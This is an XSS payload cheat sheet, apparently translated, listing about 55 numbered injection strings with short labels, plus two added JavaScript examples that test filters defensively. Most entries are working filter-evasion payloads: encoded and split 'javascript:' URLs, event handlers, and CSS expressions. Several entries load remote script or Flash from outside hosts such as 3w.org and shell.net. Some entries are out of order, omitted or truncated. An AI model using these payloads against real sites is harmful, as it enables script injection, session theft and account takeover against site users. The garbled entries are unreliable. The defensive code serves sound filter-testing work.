(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-ups
<q/oncut=alert()>
<s/onclick=alert()>
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using the javascript: directive
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) String.fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..[omitted]..S')>

(9) 7-digit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..[omitted]..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab (a literal TAB character) splitting "javascript"
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab splitting "javascript"
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multi-line injected JavaScript, the extreme XSS example (one character per line)
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
(16) Working around a character-count limit (all fragments must land on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. In practice (at least on Chinese sites) null bytes achieve almost nothing, because there is nowhere they can be exploited.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before javascript: in an IMG tag
<IMG SRC=" &#14;  javascript:alert('XSS');">
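Entries (3) through (14), (17) and (19) all defeat a filter that looks for the literal string javascript: in an attribute value, because the browser decodes character references and drops tab, newline, carriage return and leading control characters before it ever looks at the scheme. The following JavaScript is an added example, not part of the original post: it puts that naive check beside a normalising allow-list check and runs both over constructed copies of those payloads. The function names, the SAFE_SCHEMES list and the sample strings are assumptions made for this demo.

```javascript
// Added example, not from the original post: a naive "javascript:" check
// versus a normalising allow-list check, exercised against constructed
// copies of cheat-sheet entries (3)-(14), (17) and (19). Runs offline in Node.

// Naive filter seen in real code: reject values that start with the literal scheme.
function naiveIsBlocked(attrValue) {
  return attrValue.startsWith('javascript:');
}

// Decode HTML character references the way the HTML parser does for an
// attribute value: decimal (&#106;), hex (&#x6A;), with or without the trailing
// semicolon, plus a few named references. Unknown references are left as-is.
function decodeEntities(s) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", Tab: '\t', NewLine: '\n' };
  return s.replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);?/g, (m, body) => {
    if (body[0] === '#') {
      const isHex = body[1] === 'x' || body[1] === 'X';
      const cp = parseInt(body.slice(isHex ? 2 : 1), isHex ? 16 : 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
    }
    return Object.prototype.hasOwnProperty.call(named, body) ? named[body] : m;
  });
}

// The URL parser removes ASCII tab, LF and CR anywhere in the input and strips
// leading C0 controls and spaces before looking for a scheme. NUL is treated as
// removable too (entry 17 relied on older engines dropping it); assuming it
// might be stripped keeps the check fail-closed.
function normalizeUrl(attrValue) {
  return decodeEntities(attrValue)
    .replace(/[\t\n\r\0]/g, '')
    .replace(/^[\x00-\x20]+/, '');
}

// Scheme of a normalised URL, lowercased, or null for a relative URL.
function urlScheme(normalized) {
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(normalized);
  return m ? m[1].toLowerCase() : null;
}

// Allow-list rather than deny-list: anything that is not relative, http, https
// or mailto is rejected, so data:, vbscript: and javascript: all fail together.
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);
function isSafeUrl(attrValue) {
  const s = urlScheme(normalizeUrl(attrValue));
  return s === null || SAFE_SCHEMES.has(s);
}

// Constructed samples mirroring the numbered entries above.
const SAMPLES = [
  "javascript:alert('XSS')",                                                    // (3)
  "JaVaScRiPt:alert('XSS')",                                                    // (4)
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')", // (5)
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",       // (10)
  "jav\tascript:alert('XSS')",                                                  // (11)
  "jav&#x09;ascript:alert('XSS')",                                              // (12)
  "jav&#x0A;ascript:alert('XSS')",                                              // (13)
  "jav&#x0D;ascript:alert('XSS')",                                              // (14)
  "java\0script:alert('XSS')",                                                  // (17)
  " &#14;  javascript:alert('XSS')",                                            // (19)
];

// For each sample: did the naive check catch it, and does the allow-list let it through?
function evaluate(samples = SAMPLES) {
  return samples.map((value) => ({
    value,
    naiveBlocked: naiveIsBlocked(value),
    allowed: isSafeUrl(value),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of evaluate()) {
    console.log(
      `naive:${r.naiveBlocked ? 'BLOCK' : 'PASS '}  allowlist:${r.allowed ? 'ALLOW ' : 'REJECT'}  ${JSON.stringify(r.value)}`,
    );
  }
}
```

Only entry (3) trips the naive check; the allow-list rejects all ten, and it also rejects vbscript: (entry 40) and data: without any extra rule, which is the reason to allow known-good schemes instead of denying known-bad ones.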
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping a JavaScript escape filter
\";alert('XSS');//
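Entry (29) targets code that writes user input into a JavaScript string literal and only backslash-escapes double quotes: the attacker's own backslash consumes the one the server adds, so the quote still ends the string and the rest of the payload runs as code. The block below is an added example, not from the original post: a constructed vulnerable template beside a hardened one that encodes the value with JSON.stringify and additionally escapes <, >, & and the U+2028/U+2029 line terminators, with a small harness that executes each rendered script under a stubbed alert() to show which one fires. The function names and the template are assumptions made for this demo.

```javascript
// Added example, not from the original post: entry (29)'s payload against a
// template that only backslash-escapes double quotes, beside a hardened
// encoder for the same JavaScript-string slot. Runs offline in Node.

// Entry (29) as a JS string: backslash, double quote, then ;alert('XSS');//
const PAYLOAD = "\\\";alert('XSS');//";

// Vulnerable (constructed): escape only the double quote. The attacker's own
// backslash neutralises the one we add, so "\\" closes the string early and
// the rest of the payload executes as code.
function renderVulnerable(userValue) {
  const escaped = userValue.replace(/"/g, '\\"');
  return `var name = "${escaped}";`;
}

// Hardened: JSON.stringify escapes both quotes and backslashes; on top of that,
// escape <, >, & (so "</script>" cannot close the block) and the U+2028/U+2029
// line terminators, which older engines treated as line breaks inside a literal.
function jsStringLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}
function renderHardened(userValue) {
  return `var name = ${jsStringLiteral(userValue)};`;
}

// Execute a rendered inline script with a stubbed alert() that records whether
// it fired, and return the value that ended up in `name`.
function runInline(script) {
  let fired = false;
  const alertStub = () => { fired = true; };
  const fn = new Function('alert', `${script}\nreturn typeof name === 'undefined' ? undefined : name;`);
  const name = fn(alertStub);
  return { fired, name };
}

// Render and run both variants for one payload.
function demo(payload = PAYLOAD) {
  return {
    vulnerable: runInline(renderVulnerable(payload)),
    hardened: runInline(renderHardened(payload)),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  const r = demo();
  console.log('vulnerable:', renderVulnerable(PAYLOAD), '->', r.vulnerable);
  console.log('hardened:  ', renderHardened(PAYLOAD), '->', r.hardened);
}
```

The vulnerable render produces var name = "\\";alert('XSS');//"; and the stub fires with name reduced to a single backslash; the hardened render round-trips the exact payload and nothing executes. The same encoder also keeps entry (30)-style closing tags inert, because no literal < or > ever reaches the script block.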
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with an extra character in front (any of 1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute, split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (an open angle bracket followed by a letter is enough to make a tag)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression (only the tail of this payload survived in this copy)
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>